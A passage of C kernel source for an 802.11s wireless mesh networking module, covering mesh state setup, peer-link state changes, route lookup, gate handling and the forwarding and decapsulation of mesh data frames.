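 *	ieee80211_mesh_retrytimeout = msecs_to_ticks(40);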
*/ ieee80211_mesh_gateint = msecs_to_ticks(10000); ieee80211_mesh_retrytimeout = msecs_to_ticks(40); ieee80211_mesh_holdingtimeout = msecs_to_ticks(40); ieee80211_mesh_confirmtimeout = msecs_to_ticks(40); ieee80211_mesh_backofftimeout = msecs_to_ticks(5000); /* * Register action frame handlers. */ ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, mesh_recv_action_meshpeering_open); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, mesh_recv_action_meshpeering_confirm); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, mesh_recv_action_meshpeering_close); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, mesh_recv_action_meshlmetric); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, mesh_recv_action_meshgate); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, mesh_send_action_meshpeering_open); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, mesh_send_action_meshpeering_confirm); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, mesh_send_action_meshpeering_close); ieee80211_send_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, mesh_send_action_meshlmetric); ieee80211_send_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, mesh_send_action_meshgate); /* * Register Airtime Link Metric. */ ieee80211_mesh_register_proto_metric(&mesh_metric_airtime); } SYSINIT(wlan_mesh, SI_SUB_DRIVERS, SI_ORDER_FIRST, ieee80211_mesh_init, NULL); void ieee80211_mesh_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_MBSS] = mesh_vattach; } void ieee80211_mesh_detach(struct ieee80211com *ic) { } static void mesh_vdetach_peers(void *arg, struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; uint16_t args[3]; if (ni->ni_mlstate == IEEE80211_NODE_MESH_ESTABLISHED) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); } callout_drain(&ni->ni_mltimer); /* XXX belongs in hwmp */ ieee80211_ageq_drain_node(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr)); } static void mesh_vdetach(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; callout_drain(&ms->ms_cleantimer); ieee80211_iterate_nodes(&vap->iv_ic->ic_sta, mesh_vdetach_peers, NULL); ieee80211_mesh_rt_flush(vap); mtx_destroy(&ms->ms_rt_lock); ms->ms_ppath->mpp_vdetach(vap); free(vap->iv_mesh, M_80211_VAP); vap->iv_mesh = NULL; } static void mesh_vattach(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms; vap->iv_newstate = mesh_newstate; vap->iv_input = mesh_input; vap->iv_opdetach = mesh_vdetach; vap->iv_recv_mgmt = mesh_recv_mgmt; vap->iv_recv_ctl = mesh_recv_ctl; ms = malloc(sizeof(struct ieee80211_mesh_state), M_80211_VAP, M_NOWAIT | M_ZERO); if (ms == NULL) { printf("%s: couldn't alloc MBSS state\n", __func__); return; } vap->iv_mesh = ms; ms->ms_seq = 0; ms->ms_flags = (IEEE80211_MESHFLAGS_AP | IEEE80211_MESHFLAGS_FWD); ms->ms_ttl = IEEE80211_MESH_DEFAULT_TTL; TAILQ_INIT(&ms->ms_known_gates); TAILQ_INIT(&ms->ms_routes); mtx_init(&ms->ms_rt_lock, "MBSS", "802.11s routing table", MTX_DEF); callout_init(&ms->ms_cleantimer, 
CALLOUT_MPSAFE); callout_init(&ms->ms_gatetimer, CALLOUT_MPSAFE); ms->ms_gateseq = 0; mesh_select_proto_metric(vap, "AIRTIME"); KASSERT(ms->ms_pmetric, ("ms_pmetric == NULL")); mesh_select_proto_path(vap, "HWMP"); KASSERT(ms->ms_ppath, ("ms_ppath == NULL")); ms->ms_ppath->mpp_vattach(vap); } /* * IEEE80211_M_MBSS vap state machine handler. */ static int mesh_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ if (nstate != IEEE80211_S_RUN && ostate == IEEE80211_S_RUN) { callout_drain(&ms->ms_cleantimer); callout_drain(&ms->ms_gatetimer); } switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; case IEEE80211_S_CAC: ieee80211_dfs_cac_stop(vap); break; case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, mesh_vdetach_peers, NULL); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); ieee80211_mesh_rt_flush(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && !IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan) && ms->ms_idlen != 0) { /* * Already have a channel and a mesh ID; bypass * the scan and startup immediately. */ ieee80211_create_ibss(vap, vap->iv_des_chan); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_CAC: /* * Start CAC on a DFS channel. We come here when starting * a bss on a DFS channel (see ieee80211_create_ibss). */ ieee80211_dfs_cac_start(vap); break; case IEEE80211_S_RUN: switch (ostate) { case IEEE80211_S_INIT: /* * Already have a channel; bypass the * scan and startup immediately. * Note that ieee80211_create_ibss will call * back to do a RUN->RUN state change. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, vap->iv_flags_ht)); /* NB: iv_bss is changed on return */ break; case IEEE80211_S_CAC: /* * NB: This is the normal state change when CAC * expires and no radar was detected; no need to * clear the CAC timer as it's already expired. */ /* fall thru... */ case IEEE80211_S_CSA: #if 0 /* * Shorten inactivity timer of associated stations * to weed out sta's that don't follow a CSA. */ ieee80211_iterate_nodes(&ic->ic_sta, sta_csa, vap); #endif /* * Update bss node channel to reflect where * we landed after CSA. 
*/ ieee80211_node_set_chan(vap->iv_bss, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, ieee80211_htchanflags(vap->iv_bss->ni_chan))); /* XXX bypass debug msgs */ break; case IEEE80211_S_SCAN: case IEEE80211_S_RUN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { struct ieee80211_node *ni = vap->iv_bss; ieee80211_note(vap, "synchronized with %s meshid ", ether_sprintf(ni->ni_meshid)); ieee80211_print_essid(ni->ni_meshid, ni->ni_meshidlen); /* XXX MCS/HT */ printf(" channel %d\n", ieee80211_chan2ieee(ic, ic->ic_curchan)); } #endif break; default: break; } ieee80211_node_authorize(vap->iv_bss); callout_reset(&ms->ms_cleantimer, ms->ms_ppath->mpp_inact, mesh_rt_cleanup_cb, vap); mesh_gatemode_setup(vap); break; default: break; } /* NB: ostate not nstate */ ms->ms_ppath->mpp_newstate(vap, ostate, arg); return 0; } static void mesh_rt_cleanup_cb(void *arg) { struct ieee80211vap *vap = arg; struct ieee80211_mesh_state *ms = vap->iv_mesh; mesh_rt_flush_invalid(vap); callout_reset(&ms->ms_cleantimer, ms->ms_ppath->mpp_inact, mesh_rt_cleanup_cb, vap); } /* * Mark a mesh STA as gate and return a pointer to it. * If this is first time, we create a new gate route. * Always update the path route to this mesh gate. */ struct ieee80211_mesh_gate_route * ieee80211_mesh_mark_gate(struct ieee80211vap *vap, const uint8_t *addr, struct ieee80211_mesh_route *rt) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_gate_route *gr = NULL, *next; int found = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, next) { if (IEEE80211_ADDR_EQ(gr->gr_addr, addr)) { found = 1; break; } } if (!found) { /* New mesh gate add it to known table. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, addr, "%s", "stored new gate information from pro-PREQ."); gr = malloc(ALIGN(sizeof(struct ieee80211_mesh_gate_route)), M_80211_MESH_GT_RT, M_NOWAIT | M_ZERO); IEEE80211_ADDR_COPY(gr->gr_addr, addr); TAILQ_INSERT_TAIL(&ms->ms_known_gates, gr, gr_next); } gr->gr_route = rt; /* TODO: link from path route to gate route */ MESH_RT_UNLOCK(ms); return gr; } /* * Helper function to note the Mesh Peer Link FSM change. 
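 *
 * Besides logging the transition this keeps ms_neighbors in step with
 * links entering or leaving ESTABLISHED, flags the Mesh Configuration
 * beacon element for rebuild, notifies the path selection protocol of
 * a lost peer when a link drops to HOLDING (mpp_peerdown) and starts
 * path discovery towards a peer that has just become ESTABLISHED.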
*/ static void mesh_linkchange(struct ieee80211_node *ni, enum ieee80211_mesh_mlstate state) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; #ifdef IEEE80211_DEBUG static const char *meshlinkstates[] = { [IEEE80211_NODE_MESH_IDLE] = "IDLE", [IEEE80211_NODE_MESH_OPENSNT] = "OPEN SENT", [IEEE80211_NODE_MESH_OPENRCV] = "OPEN RECEIVED", [IEEE80211_NODE_MESH_CONFIRMRCV] = "CONFIRM RECEIVED", [IEEE80211_NODE_MESH_ESTABLISHED] = "ESTABLISHED", [IEEE80211_NODE_MESH_HOLDING] = "HOLDING" }; #endif IEEE80211_NOTE(vap, IEEE80211_MSG_MESH, ni, "peer link: %s -> %s", meshlinkstates[ni->ni_mlstate], meshlinkstates[state]); /* track neighbor count */ if (state == IEEE80211_NODE_MESH_ESTABLISHED && ni->ni_mlstate != IEEE80211_NODE_MESH_ESTABLISHED) { KASSERT(ms->ms_neighbors < 65535, ("neighbor count overflow")); ms->ms_neighbors++; ieee80211_beacon_notify(vap, IEEE80211_BEACON_MESHCONF); } else if (ni->ni_mlstate == IEEE80211_NODE_MESH_ESTABLISHED && state != IEEE80211_NODE_MESH_ESTABLISHED) { KASSERT(ms->ms_neighbors > 0, ("neighbor count 0")); ms->ms_neighbors--; ieee80211_beacon_notify(vap, IEEE80211_BEACON_MESHCONF); } ni->ni_mlstate = state; switch (state) { case IEEE80211_NODE_MESH_HOLDING: ms->ms_ppath->mpp_peerdown(ni); break; case IEEE80211_NODE_MESH_ESTABLISHED: ieee80211_mesh_discover(vap, ni->ni_macaddr, NULL); break; default: break; } } /* * Helper function to generate a unique local ID required for mesh * peer establishment. */ static void mesh_checkid(void *arg, struct ieee80211_node *ni) { uint16_t *r = arg; if (*r == ni->ni_mllid) *(uint16_t *)arg = 0; } static uint32_t mesh_generateid(struct ieee80211vap *vap) { int maxiter = 4; uint16_t r; do { get_random_bytes(&r, 2); ieee80211_iterate_nodes(&vap->iv_ic->ic_sta, mesh_checkid, &r); maxiter--; } while (r == 0 && maxiter > 0); return r; } /* * Verifies if we already received this packet by checking its * sequence number. * Returns 0 if the frame is to be accepted, 1 otherwise. */ static int mesh_checkpseq(struct ieee80211vap *vap, const uint8_t source[IEEE80211_ADDR_LEN], uint32_t seq) { struct ieee80211_mesh_route *rt; rt = ieee80211_mesh_rt_find(vap, source); if (rt == NULL) { rt = ieee80211_mesh_rt_add(vap, source); if (rt == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, source, "%s", "add mcast route failed"); vap->iv_stats.is_mesh_rtaddfailed++; return 1; } IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, source, "add mcast route, mesh seqno %d", seq); rt->rt_lastmseq = seq; return 0; } if (IEEE80211_MESH_SEQ_GEQ(rt->rt_lastmseq, seq)) { return 1; } else { rt->rt_lastmseq = seq; return 0; } } /* * Iterate the routing table and locate the next hop. 
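 *
 * A PROXY entry is resolved indirectly: the lookup is repeated with
 * rt_mesh_gate so the frame heads towards the proxying mesh gate, and
 * the node returned is the next hop on that path (with a reference
 * taken by ieee80211_find_txnode() that the transmit path is expected
 * to consume).  Hypothetical use, with eh an assumed Ethernet header:
 *
 *	ni = ieee80211_mesh_find_txnode(vap, eh->ether_dhost);
 *	if (ni == NULL)
 *		(no usable path: queue the frame and start discovery)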
*/ struct ieee80211_node * ieee80211_mesh_find_txnode(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_route *rt; rt = ieee80211_mesh_rt_find(vap, dest); if (rt == NULL) return NULL; if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s: !valid, flags 0x%x", __func__, rt->rt_flags); /* XXX stat */ return NULL; } if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { rt = ieee80211_mesh_rt_find(vap, rt->rt_mesh_gate); if (rt == NULL) return NULL; if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s: meshgate !valid, flags 0x%x", __func__, rt->rt_flags); /* XXX stat */ return NULL; } } return ieee80211_find_txnode(vap, rt->rt_nexthop); } static void mesh_transmit_to_gate(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_mesh_route *rt_gate) { struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); ni = ieee80211_mesh_find_txnode(vap, rt_gate->rt_dest); if (ni == NULL) { ifp->if_oerrors++; m_freem(m); return; } /* * Send through the VAP packet transmit path. * This consumes the node ref grabbed above and * the mbuf, regardless of whether there's a problem * or not. */ (void) ieee80211_vap_pkt_send_dest(vap, m, ni); } /* * Forward the queued frames to known valid mesh gates. * Assume destination to be outside the MBSS (i.e. proxy entry), * If no valid mesh gates are known silently discard queued frames. * After transmitting frames to all known valid mesh gates, this route * will be marked invalid, and a new path discovery will happen in the hopes * that (at least) one of the mesh gates have a new proxy entry for us to use. */ void ieee80211_mesh_forward_to_gates(struct ieee80211vap *vap, struct ieee80211_mesh_route *rt_dest) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt_gate; struct ieee80211_mesh_gate_route *gr = NULL, *gr_next; struct mbuf *m, *mcopy, *next; IEEE80211_TX_UNLOCK_ASSERT(ic); KASSERT( rt_dest->rt_flags == IEEE80211_MESHRT_FLAGS_DISCOVER, ("Route is not marked with IEEE80211_MESHRT_FLAGS_DISCOVER")); /* XXX: send to more than one valid mash gate */ MESH_RT_LOCK(ms); m = ieee80211_ageq_remove(&ic->ic_stageq, (struct ieee80211_node *)(uintptr_t) ieee80211_mac_hash(ic, rt_dest->rt_dest)); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, gr_next) { rt_gate = gr->gr_route; if (rt_gate == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_HWMP, rt_dest->rt_dest, "mesh gate with no path %6D", gr->gr_addr, ":"); continue; } if ((rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) continue; KASSERT(rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_GATE, ("route not marked as a mesh gate")); KASSERT((rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) == 0, ("found mesh gate that is also marked porxy")); /* * convert route to a proxy route gated by the current * mesh gate, this is needed so encap can built data * frame with correct address. */ rt_dest->rt_flags = IEEE80211_MESHRT_FLAGS_PROXY | IEEE80211_MESHRT_FLAGS_VALID; rt_dest->rt_ext_seq = 1; /* random value */ IEEE80211_ADDR_COPY(rt_dest->rt_mesh_gate, rt_gate->rt_dest); IEEE80211_ADDR_COPY(rt_dest->rt_nexthop, rt_gate->rt_nexthop); rt_dest->rt_metric = rt_gate->rt_metric; rt_dest->rt_nhops = rt_gate->rt_nhops; ieee80211_mesh_rt_update(rt_dest, ms->ms_ppath->mpp_inact); MESH_RT_UNLOCK(ms); /* XXX: lock?? 
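 *
 * The routing table lock is dropped across the m_dup()/transmit below,
 * presumably because mesh_transmit_to_gate() enters the vap transmit
 * path, which should not run with MESH_RT_LOCK held; it is retaken
 * before the next gate is examined, so the gate list may change while
 * we transmit, which appears to be what the lock question refers to.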
*/ mcopy = m_dup(m, M_NOWAIT); for (; mcopy != NULL; mcopy = next) { next = mcopy->m_nextpkt; mcopy->m_nextpkt = NULL; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_HWMP, rt_dest->rt_dest, "flush queued frame %p len %d", mcopy, mcopy->m_pkthdr.len); mesh_transmit_to_gate(vap, mcopy, rt_gate); } MESH_RT_LOCK(ms); } rt_dest->rt_flags = 0; /* Mark invalid */ m_freem(m); MESH_RT_UNLOCK(ms); } /* * Forward the specified frame. * Decrement the TTL and set TA to our MAC address. */ static void mesh_forward(struct ieee80211vap *vap, struct mbuf *m, const struct ieee80211_meshcntl *mc) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ifnet *ifp = vap->iv_ifp; const struct ieee80211_frame *wh = mtod(m, const struct ieee80211_frame *); struct mbuf *mcopy; struct ieee80211_meshcntl *mccopy; struct ieee80211_frame *whcopy; struct ieee80211_node *ni; int err; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(ic); /* * mesh ttl of 1 means we are the last one receving it, * according to amendment we decrement and then check if * 0, if so we dont forward. */ if (mc->mc_ttl < 1) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, ttl 1"); vap->iv_stats.is_mesh_fwd_ttl++; return; } if (!(ms->ms_flags & IEEE80211_MESHFLAGS_FWD)) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, fwding disabled"); vap->iv_stats.is_mesh_fwd_disabled++; return; } mcopy = m_dup(m, M_NOWAIT); if (mcopy == NULL) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, cannot dup"); vap->iv_stats.is_mesh_fwd_nobuf++; ifp->if_oerrors++; return; } mcopy = m_pullup(mcopy, ieee80211_hdrspace(ic, wh) + sizeof(struct ieee80211_meshcntl)); if (mcopy == NULL) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, too short"); vap->iv_stats.is_mesh_fwd_tooshort++; ifp->if_oerrors++; m_freem(mcopy); return; } whcopy = mtod(mcopy, struct ieee80211_frame *); mccopy = (struct ieee80211_meshcntl *) (mtod(mcopy, uint8_t *) + ieee80211_hdrspace(ic, wh)); /* XXX clear other bits? */ whcopy->i_fc[1] &= ~IEEE80211_FC1_RETRY; IEEE80211_ADDR_COPY(whcopy->i_addr2, vap->iv_myaddr); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { ni = ieee80211_ref_node(vap->iv_bss); mcopy->m_flags |= M_MCAST; } else { ni = ieee80211_mesh_find_txnode(vap, whcopy->i_addr3); if (ni == NULL) { /* * [Optional] any of the following three actions: * o silently discard * o trigger a path discovery * o inform TA that meshDA is unknown. */ IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, no path"); ms->ms_ppath->mpp_senderror(vap, whcopy->i_addr3, NULL, IEEE80211_REASON_MESH_PERR_NO_FI); vap->iv_stats.is_mesh_fwd_nopath++; m_freem(mcopy); return; } IEEE80211_ADDR_COPY(whcopy->i_addr1, ni->ni_macaddr); } KASSERT(mccopy->mc_ttl > 0, ("%s called with wrong ttl", __func__)); mccopy->mc_ttl--; /* XXX calculate priority so drivers can find the tx queue */ M_WME_SETAC(mcopy, WME_AC_BE); /* XXX do we know m_nextpkt is NULL? */ mcopy->m_pkthdr.rcvif = (void *) ni; /* * XXX this bypasses all of the VAP TX handling; it passes frames * directly to the parent interface. * * Because of this, there's no TX lock being held as there's no * encaps state being used. * * Doing a direct parent transmit may not be the correct thing * to do here; we'll have to re-think this soon. 
*/ IEEE80211_TX_LOCK(ic); err = ieee80211_parent_xmitpkt(ic, mcopy); IEEE80211_TX_UNLOCK(ic); if (err != 0) { /* NB: IFQ_HANDOFF reclaims mbuf */ ieee80211_free_node(ni); } else { ifp->if_opackets++; } } static struct mbuf * mesh_decap(struct ieee80211vap *vap, struct mbuf *m, int hdrlen, int meshdrlen) { #define WHDIR(wh) ((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) uint8_t b[sizeof(struct ieee80211_qosframe_addr4) + sizeof(struct ieee80211_meshcntl_ae10)]; const struct ieee80211_qosframe_addr4 *wh; const struct ieee80211_meshcntl_ae10 *mc; struct ether_header *eh; struct llc *llc; int ae; if (m->m_len < hdrlen + sizeof(*llc) && (m = m_pullup(m, hdrlen + sizeof(*llc))) == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ANY, "discard data frame: %s", "m_pullup failed"); vap->iv_stats.is_rx_tooshort++; return NULL; } memcpy(b, mtod(m, caddr_t), hdrlen); wh = (const struct ieee80211_qosframe_addr4 *)&b[0]; mc = (const struct ieee80211_meshcntl_ae10 *)&b[hdrlen - meshdrlen]; KASSERT(WHDIR(wh) == IEEE80211_FC1_DIR_FROMDS || WHDIR(wh) == IEEE80211_FC1_DIR_DSTODS, ("bogus dir, fc 0x%x:0x%x", wh->i_fc[0], wh->i_fc[1])); llc = (struct llc *)(mtod(m, caddr_t) + hdrlen); if (llc->llc_dsap == LLC_SNAP_LSAP && llc->llc_ssap == LLC_SNAP_LSAP && llc->llc_control == LLC_UI && llc->llc_snap.org_code[0] == 0 && llc->llc_snap.org_code[1] == 0 && llc->llc_snap.org_code[2] == 0 && /* NB: preserve AppleTalk frames that have a native SNAP hdr */ !(llc->llc_snap.ether_type == htons(ETHERTYPE_AARP) || llc->llc_snap.ether_type == htons(ETHERTYPE_IPX))) { m_adj(m, hdrlen + sizeof(struct llc) - sizeof(*eh)); llc = NULL; } else { m_adj(m, hdrlen - sizeof(*eh)); } eh = mtod(m, struct ether_header *); ae = mc->mc_flags & IEEE80211_MESH_AE_MASK; if (WHDIR(wh) == IEEE80211_FC1_DIR_FROMDS) { IEEE80211_ADDR_COPY(eh->ether_dhost, wh->i_addr1); if (ae == IEEE80211_MESH_AE_00) { IEEE80211_ADDR_COPY(eh->ether_shost, wh->i_addr3); } else if (ae == IEEE80211_MESH_AE_01) { IEEE80211_ADDR_COPY(eh->ether_shost, MC01(mc)->mc_addr4); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, (const struct ieee80211_frame *)wh, NULL, "bad AE %d", ae); vap->iv_stats.is_mesh_badae++; m_freem(m); return NULL; } } else { if (ae == IEEE80211_MESH_AE_00) { IEEE80211_ADDR_COPY(eh->ether_dhost, wh->i_addr3); IEEE80211_ADDR_COPY(eh->ether_shost, wh->i_addr4); } else if (ae == IEEE80211_MESH_AE_10) { IEEE80211_ADDR_COPY(eh->ether_dhost, mc->mc_addr5); IEEE80211_ADDR_COPY(eh->ether_shost, mc->mc_addr6); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, (const struct ieee80211_frame *)wh, NULL, "bad AE %d", ae); vap->iv_stats.is_mesh_badae++; m_freem(m); return NULL; } } #ifndef __NO_STRICT_ALIGNMENT if (!ALIGNED_POINTER(mtod(m, caddr_t) + sizeof(*eh), uint32_t)) { m = ieee80211_realign(vap, m, sizeof(*eh)); if (m == NULL) return NULL; } #endif /* !__NO_STRICT_ALIGNMENT */ if (llc != NULL) { eh = mtod(m, struct ether_header *); eh->ether_type = htons(m->m_pkthdr.len - sizeof(*eh)); } return m; #undef WDIR #undef MC01 } /* * Return non-zero if the unicast mesh data frame should be processed * locally. Frames that are not proxy'd have our address, otherwise * we need to consult the routing table to look for a proxy entry. 
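 *
 * Concretely: with AE 00 the mesh DA is carried in i_addr3 and must
 * match iv_myaddr; with AE 10 the proxied destination is mc_addr5 in
 * the Mesh Control field, and the frame is ours if we hold a PROXY
 * route for that address, i.e. we are the mesh gate proxying it.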
*/ static __inline int mesh_isucastforme(struct ieee80211vap *vap, const struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { int ae = mc->mc_flags & 3; KASSERT((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS, ("bad dir 0x%x:0x%x", wh->i_fc[0], wh->i_fc[1])); KASSERT(ae == IEEE80211_MESH_AE_00 || ae == IEEE80211_MESH_AE_10, ("bad AE %d", ae)); if (ae == IEEE80211_MESH_AE_10) { /* ucast w/ proxy */ const struct ieee80211_meshcntl_ae10 *mc10 = (const struct ieee80211_meshcntl_ae10 *) mc; struct ieee80211_mesh_route *rt = ieee80211_mesh_rt_find(vap, mc10->mc_addr5); /* check for proxy route to ourself */ return (rt != NULL && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY)); } else /* ucast w/o proxy */ return IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_myaddr); } /* * Verifies transmitter, updates lifetime, precursor list and forwards data. * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_indiv_data_to_fwrd(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { struct ieee80211_qosframe_addr4 *qwh; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt_meshda, *rt_meshsa; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); qwh = (struct ieee80211_qosframe_addr4 *)wh; /* * TODO: * o verify addr2 is a legitimate transmitter * o lifetime of precursor of addr3 (addr2) is max(init, curr) * o lifetime of precursor of addr4 (nexthop) is max(init, curr) */ /* set lifetime of addr3 (meshDA) to initial value */ rt_meshda = ieee80211_mesh_rt_find(vap, qwh->i_addr3); if (rt_meshda == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, qwh->i_addr2, "no route to meshDA(%6D)", qwh->i_addr3, ":"); /* * [Optional] any of the following three actions: * o silently discard [X] * o trigger a path discovery [ ] * o inform TA that meshDA is unknown. [ ] */ /* XXX: stats */ return (-1); } ieee80211_mesh_rt_update(rt_meshda, ticks_to_msecs( ms->ms_ppath->mpp_inact)); /* set lifetime of addr4 (meshSA) to initial value */ rt_meshsa = ieee80211_mesh_rt_find(vap, qwh->i_addr4); KASSERT(rt_meshsa != NULL, ("no route")); ieee80211_mesh_rt_update(rt_meshsa, ticks_to_msecs( ms->ms_ppath->mpp_inact)); mesh_forward(vap, m, mc); return (1); /* dont process locally */ } /* * Verifies transmitter, updates lifetime, precursor list and process data * locally, if data is proxy with AE = 10 it could mean data should go * on another mesh path or data should be forwarded to the DS. 
* * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_indiv_data_to_me(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { struct ieee80211_qosframe_addr4 *qwh; const struct ieee80211_meshcntl_ae10 *mc10; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; int ae; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); qwh = (struct ieee80211_qosframe_addr4 *)wh; mc10 = (const struct ieee80211_meshcntl_ae10 *)mc; /* * TODO: * o verify addr2 is a legitimate transmitter * o lifetime of precursor entry is max(init, curr) */ /* set lifetime of addr4 (meshSA) to initial value */ rt = ieee80211_mesh_rt_find(vap, qwh->i_addr4); KASSERT(rt != NULL, ("no route")); ieee80211_mesh_rt_update(rt, ticks_to_msecs(ms->ms_ppath->mpp_inact)); rt = NULL; ae = mc10->mc_flags & IEEE80211_MESH_AE_MASK; KASSERT(ae == IEEE80211_MESH_AE_00 || ae == IEEE80211_MESH_AE_10, ("bad AE %d", ae)); if (ae == IEEE80211_MESH_AE_10) { if 